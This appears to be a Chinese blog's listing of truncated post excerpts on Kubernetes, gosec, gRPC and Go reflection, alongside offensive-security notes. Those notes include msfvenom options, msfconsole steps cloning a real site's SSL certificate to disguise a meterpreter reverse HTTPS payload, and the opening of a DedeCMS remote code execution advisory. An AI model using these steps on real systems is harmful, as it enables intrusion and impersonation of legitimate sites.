集群级别的资源作用于集群之上，集群下的所有资源都可以共享 namespace一个集群中的概念，可以简单理解为使用命名空间(namespace)，在集群内划分出了很多不同的小的集群 在同一个命名空间中的资源是可以相互访问的，但是不同的命名空间中的是拒绝访问

对象和资源Kubernetes中的所有内容都被抽象为”资源”，如Pod、Service、Node等都是资源。“对象“就是”资源”的实何，是持久化的实体。如某个具体的Pod、某个具体的Node。Kubernetes使用这些实体去表示整个集群的状态。对象的创建、除、修改都是通过”Kubernetes API”,也就是”Api Server”组件提供的API接口，这些是RESTful风格的Api，与k8

masterapi-server一个基于rest 风格的接口，用于操作k8s controller-manager控制器管理器 管理各个类型的控制器 针对k8s 中的各种资源进行管理 cloud-controller-manager云控制器管理器 用于第三方云平台的api 对接的管理器 kube-scheduler调度器 负责将pod 基于一定算法，将其调度到合适的节点（服务器）上 etcdk8

代码审计工具 gosec 1https://github.com/securego/gosec 简单的使用方法 直接输出内容到终端 1gosec -fmt=json ./...` 支持的格式有：`text, json, yaml, csv, sonarqube, JUnit XML, html 输出到指定文件 1`gosec -fmt=json -out=results.json ./

msfvenom部分参数解读1234567891011121314151617181920212223242526272829303132333435363738-p, –payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的-l, –list [module_type] 列出指定模块的所有可用资源. 模块类型

制作证书进入 msfconsole 123use auxiliary/gather/impersonate_sslset rhosts www.4399.comrun 记录证书的位置cert_4399.pem 生成payload123456use payload/windows/x64/meterpreter_reverse_httpsset stagerverifysslcert 1set

参考 Ingress | Kubernetes Kubernetes K8S之Ingress详解与示例-腾讯云开发者社区-腾讯云 (tencent.com)

参考文章 Quick start | Go | gRPC Quick start | Go | gRPC 环境搭建安装protoc 转换工具，该工具无论是server 或者是clinet 都是可以准备一个 https://github.com/protocolbuffers/protobuf/releases 然后创建一个新的项目 拉一下 123go get github.com/golan

0x01 产品简介织梦内容管理系统(DedeCMS)，是一个集内容发布、编辑、管理检索等于一体的网站管理系统(Web CMS)，他拥有国外CMS众多特点之外，还结合中国用户的需要，对内容管理系统概念进行明确分析和定位。 0x02 漏洞描述DedeCMS V5.7.114存在远程代码执行漏洞。产生该漏洞的原因是，虽然sys_verizes.php对编辑的文件进行了一定的限制，但攻击者仍然可以绕过这些

简介反射reflect 变量的内在机制变量包包含了类型信息，和值信息 类型信息是静态的元信息是预先定义好的 值信息，是程序运行过程中动态改变的 反射的使用reflect 包封装了反射相关的方法 reflect.TypeOf 是静态的 reflect.ValueOf 是动态的 空接口与反射